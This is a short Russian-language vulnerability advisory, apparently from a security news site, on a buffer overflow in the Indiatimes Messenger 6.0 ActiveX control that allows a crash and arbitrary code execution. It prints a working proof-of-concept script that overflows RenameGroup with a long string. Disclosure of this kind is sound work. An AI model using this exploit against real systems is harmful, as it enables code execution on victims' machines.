Программа: Indiatimes Messenger 6.0 

Уязвимость позволяет локальному пользователю вызвать отказ в обслуживании приложения и выполнить произвольный код на целевой системе.
Злоумышленник может создать специально сформированный сценарий и аварийно завершить работу приложения.
Удаленный пользователь может перезаписать ECX и EDI регистры и выполнить произвольный код на целевой системе с привилегиями пользователя, запустившего приложение. 

Эксплоит: 

[script]
var obj1 = new
ActiveXObject("MMClient.MunduMessenger.1");
var buf = ""; 

for(i=0; i<1000; i++)
{
buf += "A";
}
while(obj1.GetServerStatus() != "Logged In"); //wait till login
obj1.RenameGroup("Friends", buf, 5);
[/script]

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии